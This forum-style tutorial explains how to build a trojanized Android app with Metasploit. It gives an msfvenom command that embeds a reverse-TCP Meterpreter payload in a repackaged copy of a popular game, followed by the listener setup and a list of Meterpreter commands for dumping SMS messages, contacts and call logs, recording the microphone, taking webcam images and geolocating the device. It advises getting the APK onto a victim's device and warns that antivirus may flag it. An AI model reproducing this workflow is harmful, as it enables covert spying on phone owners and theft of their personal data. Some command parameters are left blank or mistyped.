Metasploit: Android Session


Jarret W. Buse

Metasploit: Android Session

In previous articles, I have covered how to access a Windows system as well as a Linux system. What if you wanted to gain access to the widest available Operating System (OS)? In this article, I will cover the process of gaining access to an Android system, which includes tablets and phones.

Similar to the Linux Session article, this article will cover creating a Trojan to gain access to an Android system.

First, I will go over how to create the Trojan and secondly discuss how to get the Trojan onto the Android systems. For Network Administrators, you can learn how this process works and train your network users how to avoid getting Trojans. The result of getting a Trojan on an Android system is that others can gain access to your device. For phones, access allows the downloading of your contact list, text messages and a listing of phone calls sent and received.

To start, you need an existing Android Application Package (APK). Find one which seems to be popular and definitely requires network access. Usually, a game which accesses a server works fine, but not needed. Get the APK file and download it to your system. For this example, I will use “Angry Birds Rio”. APK files can be downloaded from and saved to your PC. Save the APK file in a folder easily accessible. In my example, I saved it to my Desktop (/home/jarret/Desktop/).

The command to run is “msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp LHOST= LPORT=3333 -x /home/jarret/Desktop/Angry\ Birds\ Rio\ R -o /home/jarret/Desktop/Angry\ Birds\ Rio\”. Let's go over the parameters so you understand how it works.

The options are as follows:

  • -a – architecture of the system for the file being created (depends on platform)
    • sparc
    • x86
    • x86_64
    • armle
    • cbea
    • cbea64
    • dalvik
    • java
    • mipsbe
    • mipsle
    • ppc
    • ppc64
    • cmd
    • tty
    • x64
  • --platform – platform of the target system
  • -p – payload to use against the target
    • AIX
    • Android
    • BSD
    • BSDi
    • Firefox
    • Java
    • Linux
    • Netware
    • NodeJS
    • OSX
    • PHP
    • Python
    • Ruby
    • Solaris
    • UNIX
    • Windows
  • -x – template to use
  • -o – output folder and file
  • R – format of the output file (raw)

NOTE: Be sure to set the LHOST and LPORT correctly. The LHOST IP Address is the system on which Meterpreter will be running and listening for the Android device. The LPORT is the specific port on which the device will be querying the LHOST. Keep special note of these to make sure the values are used later.

Once the command completes, you should have a new APK file. Now, you need to get the APK file to the user of the Android device to be placed onto the device. Once the APK file is installed and run, the Meterpreter system should be listening.

NOTE: Be aware that a virus scanner such as Avira can detect the Trojan APK file.

Before moving on to starting Metasploit, let's look at another method of creating the Trojan in a Graphical User Interface (GUI). Open your browser and connect to the Meterpreter system and the port specified during installation. The default port is 3790. On my system, I connect to and log in using the account created when Metasploit was installed. Once logged in, I can choose the icon for “Payload Generator” as shown in Figure 1.

Figure 1.jpg


When the “Payload Generator” starts, select “Classic Payload” at the top of the window. Specify the “Platform” as Android and notice that the “Architecure” option disappears. The platform for Android is Dalvik and is not needed since it is the only option. The “Stager” is set up as “reverse_tcp” with the stage set as “android/meterpreter”. Set your LHOST and LPORT for the meterpreter session as needed. The options are shown in Figure 2.

Figure 2.jpg


Next, select the “Output Options” and set the type of output to “Raw Bytes” as shown in Figure 3. The APK file is not an executable file, but a compressed file with installation instructions similar to a “.deb” or “.rpm” file. Click “Generate” so the file can be created and then you can “download” the file and specify where to save it. Now, you need to get it onto the Android device and installed on it.

Figure 3.jpg


To start Meterpreter listening for the “infected” systems, perform the following:
  • use exploit/multi/handler
  • set PAYLOAD android/meterpreter/reverse_tcp
  • set LHOST
  • set LHOST 3333
  • exploit

NOTE: Since the initial exploit being loaded is “multi”, it means that Metasploit will listen for responses from any system or device. The Operating System (OS) can be of any available type. The type of OS is not limited to a single OS, but any OS contacting the LHOST.

Metasploit should now be listening for a response from any Trojans that become active. Once the Target Host has created the session back to Metasploit, you can then start accessing the Android device.

The available commands which can be used in Meterpreter are as follows:

Core Commands

? - Help menu
background - Backgrounds the current session
bgkill - Kills a background meterpreter script
bglist - Lists running background scripts
bgrun - Executes a meterpreter script as a background thread
channel - Displays information about active channels
close - Closes a channel
disable_unicode_encoding - Disables encoding of unicode strings
enable_unicode_encoding - Enables encoding of unicode strings
exit - Terminate the meterpreter session
get_timeouts - Get the current session timeout values
help - Help menu
info - Displays information about a Post module
interact - Interacts with a channel
irb - Drop into irb scripting mode
load - Load one or more meterpreter extensions
machine_id - Get the MSF ID of the machine attached to the session
quit - Terminate the meterpreter session
read - Reads data from a channel
resource - Run the commands stored in a file
run - Executes a meterpreter script or Post module
set_timeouts - Set the current session timeout values
sleep - Force Meterpreter to go quiet, then re-establish session.
Transport - Change the current transport mechanism
use - Deprecated alias for 'load'
uuid - Get the UUID for the current session
write - Writes data to a channel

Stdapi: File system Commands

cat - Read the contents of a file to the screen
cd - Change directory
download - Download a file or directory
edit - Edit a file
getlwd - Print local working directory
getwd - Print working directory
lcd - Change local working directory
lpwd - Print local working directory
ls - List files
mkdir - Make directory
pwd - Print working directory
rm - Delete the specified file
rmdir - Remove directory
search - Search for files
upload - Upload a file or directory

Stdapi: Networking Commands

ifconfig - Display interfaces
portfwd - Forward a local port to a remote service
route - View and modify the routing table

Stdapi: System Commands

execute - Execute a command
getuid - Get the user that the server is running as
ps - List running processes
shell - Drop into a system command shell
sysinfo - Gets information about the remote system, such as OS

Stdapi: Webcam Commands

record_mic - Record audio from the default microphone for X seconds
webcam_chat - Start a video chat
webcam_list - List webcams
webcam_snap - Take a snapshot from the specified webcam
webcam_stream - Play a video stream from the specified webcam

Android Commands

check_root - Check if device is rooted
dump_calllog - Get call log
dump_contacts - Get contacts list
dump_sms - Get sms messages
geolocate - Get current lat-long using geolocation

Depending on the Android Device, some commands may not work.

Try this out on an Android Device and see how simple it is to attack an Android Device and get data from the device.

NOTE: To find the Trojan app on the device, look for the installed program called “MainActivity” and uninstall it.


Last edited:
$100 Digital Ocean Credit
Get a free VM to test out Linux!